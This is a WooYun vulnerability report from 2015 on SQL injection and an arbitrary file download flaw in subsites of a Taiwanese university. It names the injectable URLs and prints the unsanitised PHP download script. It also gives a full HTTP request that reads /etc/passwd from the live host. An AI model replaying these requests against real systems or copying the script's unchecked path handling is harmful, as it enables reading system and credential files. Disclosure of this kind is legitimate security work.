当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-098773

漏洞标题:台湾某大学问题打包#2

相关厂商:Hitcon台湾互联网漏洞报告平台

漏洞作者: scanf

提交时间:2015-03-02 11:03

修复时间:2015-04-16 11:04

公开时间:2015-04-16 11:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-02: 细节已通知厂商并且等待厂商处理中
2015-03-03: 厂商已经确认,细节仅向厂商公开
2015-03-13: 细节向核心白帽子及相关领域专家公开
2015-03-23: 细节向普通白帽子公开
2015-04-02: 细节向实习白帽子公开
2015-04-16: 细节向公众公开

简要描述:

详细说明:

是www.ccu.edu.tw的分站
第一处 http://secretar.ccu.edu.tw/secretar_web/mw/news_content.php?nid=39

QQ截图20150228152355.jpg


QQ截图20150228152825.jpg


第二处 http://inoffice.ccu.edu.tw/elitist/elitist_show.php?Elististsubcat_ID=12

QQ截图20150228152913.jpg


然后登录后台

QQ截图20150228153251.jpg


任意浏览目录呢

QQ截图20150228153353.jpg


顺便选个
然后抓包

QQ截图20150228153441.jpg


QQ截图20150228153527.jpg


download_file.php的源码

<?php
$path = $_GET['path'];
$file = $_GET['file'];
$fp = fopen($path, "rb");
$len = filesize($path);
$data = fread($fp, $len);
fclose($fp);
$file = iconv("utf-8","big5",$file);
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename='.$file );
header('Content-Transfer-Encoding: binary');
header('Expires: 0');
header('Cache-Control: must-revalidate');
header('Pragma: public');
header('Content-Length: ' . filesize($path));
echo $data;
exit();
?>


QQ截图20150228154016.jpg


POST包

GET /pass_login/admin/download_file.php?path=/etc/passwd&file= HTTP/1.1
Host: inoffice.ccu.edu.tw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://inoffice.ccu.edu.tw/pass_login/admin/download.php?id=36
Cookie: PHPSESSID=kjkhk2699ulduem6jq2rarjj30; __utma=201458249.360123480.1425100241.1425100241.1425100241.1; __utmb=201458249.1.10.1425100241; __utmc=201458249; __utmz=201458249.1425100241.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1
Connection: keep-alive


第三处 http://isia.ccu.edu.tw/web.php?q=fe

漏洞证明:

QQ截图20150228154143.jpg


QQ截图20150228154431.jpg

修复方案:

过滤.

版权声明:转载请注明来源 scanf@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-03-03 00:11

厂商回复:

感謝通報

最新状态:

暂无